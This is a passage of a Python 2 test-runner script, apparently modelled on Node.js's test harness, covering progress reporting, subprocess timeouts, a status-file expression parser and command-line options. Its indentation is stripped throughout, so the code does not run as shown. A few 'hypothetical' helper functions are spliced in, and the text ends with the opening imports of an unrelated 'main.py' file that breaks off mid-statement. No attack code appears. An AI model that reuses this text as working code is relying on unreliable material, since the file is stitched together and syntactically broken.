command = basename(output.command[-1])
if output.UnexpectedOutput():
status_line = 'not ok %i - %s' % (self._done, command)
if FLAKY in output.test.outcomes and self.flaky_tests_mode == "dontcare":
status_line = status_line + " # TODO : Fix flaky test"
logger.info(status_line)
for l in output.output.stderr.splitlines():
logger.info('#' + l)
for l in output.output.stdout.splitlines():
logger.info('#' + l)
else:
status_line = 'ok %i - %s' % (self._done, command)
if FLAKY in output.test.outcomes:
status_line = status_line + " # TODO : Fix flaky test"
logger.info(status_line)
duration = output.test.duration
# total_seconds() was added in 2.7
total_seconds = (duration.microseconds +
(duration.seconds + duration.days * 24 * 3600) * 10**6) / 10**6
logger.info(' ---')
logger.info(' duration_ms: %d.%d' % (total_seconds, duration.microseconds / 1000))
logger.info(' ...')
def Done(self):
pass
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, flaky_tests_mode, templates):
super(CompactProgressIndicator, self).__init__(cases, flaky_tests_mode)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print self.templates['stdout'] % stdout
stderr = output.output.stderr.strip()
if len(stderr):
print self.templates['stderr'] % stderr
print "Command: %s" % EscapeCommand(output.command)
if output.HasCrashed():
print "--- CRASHED ---"
if output.HasTimedOut():
print "--- TIMEOUT ---"
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print status,
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print "\033[1K\r",
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"),
'max_length': 78
}
super(MonochromeProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print ("\r" + (" " * last_line_length) + "\r"),
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'color': ColorProgressIndicator,
'tap': TapProgressIndicator,
'mono': MonochromeProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, mode):
self.path = path
self.context = context
self.duration = None
self.mode = mode
def IsNegative(self):
return False
def CompareTime(self, other):
return cmp(other.duration, self.duration)
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self.mode))
self.Cleanup()
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def BeforeRun(self):
pass
def AfterRun(self, result):
pass
def Run(self):
self.BeforeRun()
try:
result = self.RunCommand(self.GetCommand())
finally:
# Tests can leave the tty in non-blocking mode. If the test runner
# tries to print to stdout/stderr after that and the tty buffer is
# full, it'll die with a EAGAIN OSError. Ergo, put the tty back in
# blocking mode before proceeding.
if sys.platform != 'win32':
from fcntl import fcntl, F_GETFL, F_SETFL
from os import O_NONBLOCK
for fd in 0,1,2: fcntl(fd, F_SETFL, ~O_NONBLOCK & fcntl(fd, F_GETFL))
self.AfterRun(result)
return result
def Cleanup(self):
return
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasPreciousOutput(self):
return self.UnexpectedOutput() and self.store_unexpected_output
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0 and \
self.output.exit_code != -signal.SIGABRT
def HasTimedOut(self):
return self.output.timed_out;
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
os.kill(pid, signal.SIGTERM)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode);
except ImportError:
pass
return prev_error_mode
def RunProcess(context, timeout, args, **rest):
if context.verbose: print "#", " ".join(args)
popen_args = args
prev_error_mode = SEM_INVALID_VALUE;
if utils.IsWindows():
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
error_mode = SEM_NOGPFAULTERRORBOX;
prev_error_mode = Win32SetErrorMode(error_mode);
Win32SetErrorMode(error_mode | prev_error_mode);
process = subprocess.Popen(
shell = utils.IsWindows(),
args = popen_args,
**rest
)
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillProcessWithID(process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
try:
os.unlink(name)
except OSError, e:
PrintError("os.unlink() " + str(e))
def Execute(args, context, timeout=None):
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
stdout = fd_out,
stderr = fd_err,
)
os.close(fd_out)
os.close(fd_err)
output = file(outname).read()
errors = file(errname).read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def ExecuteNoCapture(args, context, timeout=None):
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
)
return CommandOutput(exit_code, False, "", "")
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
class TestConfiguration(object):
def __init__(self, context, root):
self.context = context
self.root = root
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in xrange(len(path)):
if not path[i].match(file[i]):
return False
return True
def GetTestStatus(self, sections, defs):
pass
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
# Use this to run several variants of the tests, e.g.:
# VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']]
VARIANT_FLAGS = [[]]
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
file = None
try:
(file, pathname, description) = imp.find_module('testcfg', [ self.path ])
module = imp.load_module('testcfg', file, pathname, description)
self.config = module.GetConfiguration(context, self.path)
finally:
if file:
file.close()
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def AddTestsToList(self, result, current_path, path, context, mode):
for v in VARIANT_FLAGS:
tests = self.GetConfiguration(context).ListTests(current_path, path, mode)
for t in tests: t.variant_flags = v
result += tests
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests):
super(LiteralTestSuite, self).__init__('root')
self.tests = tests
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def ListTests(self, current_path, path, context, mode):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, mode)
result.sort(cmp=lambda a, b: cmp(a.GetName(), b.GetName()))
return result
def GetTestStatus(self, context, sections, defs):
for test in self.tests:
test.GetTestStatus(context, sections, defs)
SUFFIX = {
'debug' : '_g',
'release' : '' }
FLAGS = {
'debug' : ['--enable-slow-asserts', '--debug-code', '--verify-heap'],
'release' : []}
TIMEOUT_SCALEFACTOR = {
'debug' : 4,
'release' : 1 }
class Context(object):
def __init__(self, workspace, buildspace, verbose, vm, timeout, processor, suppress_dialogs, store_unexpected_output):
self.workspace = workspace
self.buildspace = buildspace
self.verbose = verbose
self.vm_root = vm
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
def GetVm(self, mode):
if mode == 'debug':
name = 'out/Debug/node'
else:
name = 'out/Release/node'
# Currently GYP does not support output_dir for MSVS.
# http://code.google.com/p/gyp/issues/detail?id=40
# It will put the builds into Release/node.exe or Debug/node.exe
if utils.IsWindows():
out_dir = os.path.join(dirname(__file__), "..", "out")
if not exists(out_dir):
if mode == 'debug':
name = os.path.abspath('Debug/node.exe')
else:
name = os.path.abspath('Release/node.exe')
else:
name = os.path.abspath(name + '.exe')
return name
def GetVmCommand(self, testcase, mode):
return [self.GetVm(mode)] + self.GetVmFlags(testcase, mode)
def GetVmFlags(self, testcase, mode):
return testcase.variant_flags + FLAGS[mode]
def GetTimeout(self, mode):
return self.timeout * TIMEOUT_SCALEFACTOR[mode]
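
def ExampleContext():
  # Hypothetical helper, not part of the original runner: shows how a Context
  # can be built by hand for a single release-mode run with the default 60s
  # timeout (in practice these values come from the parsed command-line
  # options).
  workspace = abspath(join(dirname(__file__), '..'))
  return Context(workspace, workspace, False,
                 'shell', 60, lambda command: command,
                 True, True)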
def RunTestCases(cases_to_run, progress, tasks, flaky_tests_mode):
progress = PROGRESS_INDICATORS[progress](cases_to_run, flaky_tests_mode)
return progress.Run(tasks)
def BuildRequirements(context, requirements, mode, scons_flags):
command_line = (['scons', '-Y', context.workspace, 'mode=' + ",".join(mode)]
+ requirements
+ scons_flags)
output = ExecuteNoCapture(command_line, context)
return output.exit_code == 0
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
FLAKY = 'flaky'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return ListSet([env[self.name]])
else: return Nothing()
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return ListSet([self.name])
class Set(object):
pass
class ListSet(Set):
def __init__(self, elms):
self.elms = elms
def __str__(self):
return "ListSet%s" % str(self.elms)
def Intersect(self, that):
if not isinstance(that, ListSet):
return that.Intersect(self)
return ListSet([ x for x in self.elms if x in that.elms ])
def Union(self, that):
if not isinstance(that, ListSet):
return that.Union(self)
return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])
def IsEmpty(self):
return len(self.elms) == 0
class Everything(Set):
def Intersect(self, that):
return that
def Union(self, that):
return self
def IsEmpty(self):
return False
class Nothing(Set):
def Intersect(self, that):
return self
def Union(self, that):
return that
def IsEmpty(self):
return True
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return not inter.IsEmpty()
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
elif self.op == 'if':
if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs)
else: return Nothing()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
else:
return None
return self.tokens
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left= Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print "Malformed expression: '%s'" % expr
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print "Malformed expression: '%s'" % expr
return None
if scan.HasMore():
print "Malformed expression: '%s'" % expr
return None
return ast
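
def ExampleParseCondition():
  # Hypothetical helper, not part of the original runner: demonstrates the
  # status-file expression language handled by the tokenizer/parser above.
  ast = ParseCondition('$mode == debug && $system == windows')
  # '==' compares outcome sets via GetOutcomes and '&&' combines the boolean
  # results, so this evaluates to True for the matching environment.
  return ast.Evaluate({'mode': 'debug', 'system': 'windows'}, {})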
class ClassifiedTest(object):
def __init__(self, case, outcomes):
self.case = case
self.outcomes = outcomes
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
self.defs = defs
def ClassifyTests(self, cases, env):
sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = [ ]
all_outcomes = set([])
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes = set([])
for rule in matches:
outcomes = outcomes.union(rule.GetOutcomes(env, self.defs))
unused_rules.discard(rule)
if not outcomes:
outcomes = [PASS]
case.outcomes = outcomes
all_outcomes = all_outcomes.union(outcomes)
result.append(ClassifiedTest(case, outcomes))
return (result, list(unused_rules), all_outcomes)
class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
set = self.value.GetOutcomes(env, defs)
assert isinstance(set, ListSet)
return set.elms
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in xrange(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
print "Malformed line: '%s'." % line
return False
return True
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option('--logfile', dest='logfile',
      help='write test output to file. NOTE: this only applies to the tap progress indicator')
result.add_option("-S", dest="scons_flags", help="Flag to pass through to scons",
default=[], action="append")
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono, tap)",
choices=PROGRESS_INDICATORS.keys(), default="mono")
result.add_option("--no-build", help="Don't build requirements",
default=True, action="store_true")
result.add_option("--build-only", help="Only build requirements, don't run the tests",
default=False, action="store_true")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=60, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--simulator", help="Run tests with architecture simulator",
default='none')
result.add_option("--special-command", default=None)
result.add_option("--use-http1", help="Pass --use-http1 switch to node",
default=False, action="store_true")
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--flaky-tests",
help="Regard tests marked as flaky (run|skip|dontcare)",
default="run")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--shell", help="Path to V8 shell", default="shell")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
return result
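# Hypothetical invocation (script name assumed for illustration):
#   python test.py -j 4 --mode=debug,release --progress=color message
# would run the built-in 'message' suite in both modes with four parallel tasks.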
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
options.mode = options.mode.split(',')
for mode in options.mode:
if not mode in ['debug', 'release']:
print "Unknown mode %s" % mode
return False
if options.simulator != 'none':
# Simulator argument was set. Make sure arch and simulator agree.
if options.simulator != options.arch:
if options.arch == 'none':
options.arch = options.simulator
else:
print "Architecture %s does not match sim %s" %(options.arch, options.simulator)
return False
# Ensure that the simulator argument is handed down to scons.
options.scons_flags.append("simulator=" + options.simulator)
else:
# If options.arch is not set by the command line and no simulator setting
# was found, set the arch to the guess.
if options.arch == 'none':
options.arch = ARCH_GUESS
options.scons_flags.append("arch=" + options.arch)
if options.snapshot:
options.scons_flags.append("snapshot=on")
def CheckTestMode(name, option):
if not option in ["run", "skip", "dontcare"]:
print "Unknown %s mode %s" % (name, option)
return False
return True
if not CheckTestMode("--flaky-tests", options.flaky_tests):
return False
return True
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(nocrash)4d tests are expected to be flaky but not crash
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
def PrintReport(cases):
def IsFlaky(o):
return (PASS in o) and (FAIL in o) and (not CRASH in o) and (not OKAY in o)
def IsFailOk(o):
return (len(o) == 2) and (FAIL in o) and (OKAY in o)
unskipped = [c for c in cases if not SKIP in c.outcomes]
print REPORT_TEMPLATE % {
'total': len(cases),
'skipped': len(cases) - len(unskipped),
'nocrash': len([t for t in unskipped if IsFlaky(t.outcomes)]),
'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]),
'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]),
'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]])
}
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
def SplitPath(s):
stripped = [ c.strip() for c in s.split('/') ]
return [ Pattern(s) for s in stripped if len(s) > 0 ]
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
pos = value.find('@')
import urllib
prefix = urllib.unquote(value[:pos]).split()
suffix = urllib.unquote(value[pos+1:]).split()
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
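# Example: Main() below sets --special-command to "python -u <run-valgrind.py> @",
# so everything before '@' becomes the prefix, the (empty) remainder the suffix,
# and ExpandCommand(['shell', 'test.js']) returns
# ['python', '-u', '<run-valgrind.py>', 'shell', 'test.js'] (paths illustrative).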
BUILT_IN_TESTS = ['simple', 'pummel', 'message', 'internet', 'gc']
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
ch = logging.StreamHandler(sys.stdout)
logger.addHandler(ch)
logger.setLevel(logging.INFO)
if options.logfile:
fh = logging.FileHandler(options.logfile)
logger.addHandler(fh)
workspace = abspath(join(dirname(sys.argv[0]), '..'))
suites = GetSuites(join(workspace, 'test'))
repositories = [TestRepository(join(workspace, 'test', name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories)
if len(args) == 0:
paths = [SplitPath(t) for t in BUILT_IN_TESTS]
else:
paths = [ ]
for arg in args:
path = SplitPath(arg)
paths.append(path)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
shell = abspath(options.shell)
buildspace = dirname(shell)
processor = GetSpecialCommandProcessor(options.special_command)
if options.use_http1:
def wrap(processor):
return lambda args: processor(args[:1] + ['--use-http1'] + args[1:])
processor = wrap(processor)
context = Context(workspace,
buildspace,
VERBOSE,
shell,
options.timeout,
processor,
options.suppress_dialogs,
options.store_unexpected_output)
# First build the required targets
if not options.no_build:
reqs = [ ]
for path in paths:
reqs += root.GetBuildRequirements(path, context)
reqs = list(set(reqs))
if len(reqs) > 0:
if options.j != 1:
options.scons_flags += ['-j', str(options.j)]
if not BuildRequirements(context, reqs, options.mode, options.scons_flags):
return 1
# Just return if we are only building the targets for running the tests.
if options.build_only:
return 0
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for mode in options.mode:
if not exists(context.GetVm(mode)):
print "Can't find shell executable: '%s'" % context.GetVm(mode)
continue
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': options.arch,
'simulator': options.simulator
}
test_list = root.ListTests([], path, context, mode)
unclassified_tests += test_list
(cases, unused_rules, all_outcomes) = config.ClassifyTests(test_list, env)
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = globally_unused_rules.intersection(unused_rules)
all_cases += cases
all_unused.append(unused_rules)
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print "--- begin source: %s ---" % test.GetLabel()
source = test.GetSource().strip()
print source
print "--- end source: %s ---" % test.GetLabel()
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path])
if options.report:
PrintReport(all_cases)
result = None
def DoSkip(case):
return (SKIP in case.outcomes or SLOW in case.outcomes or
(FLAKY in case.outcomes and options.flaky_tests == "skip"))
cases_to_run = [ c for c in all_cases if not DoSkip(c) ]
if len(cases_to_run) == 0:
print "No tests to run."
return 1
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j, options.flaky_tests):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print "Interrupted"
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ]
timed_tests.sort(lambda a, b: a.CompareTime(b))
index = 1
for entry in timed_tests[:20]:
t = FormatTime(entry.duration)
sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel()))
index += 1
return result
if __name__ == '__main__':
sys.exit(Main())
|
main.py
|
import multiprocessing
import threading
import sys
import os
from time import sleep, time  # keep 'time' bound to the time() function for current_time_us below
import signal
import subprocess
from datetime import datetime
import socket
from collections import OrderedDict
import binascii
import Crypto
import Crypto.Random
from Crypto.Hash import SHA
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
import random
import hashlib
import json
try:
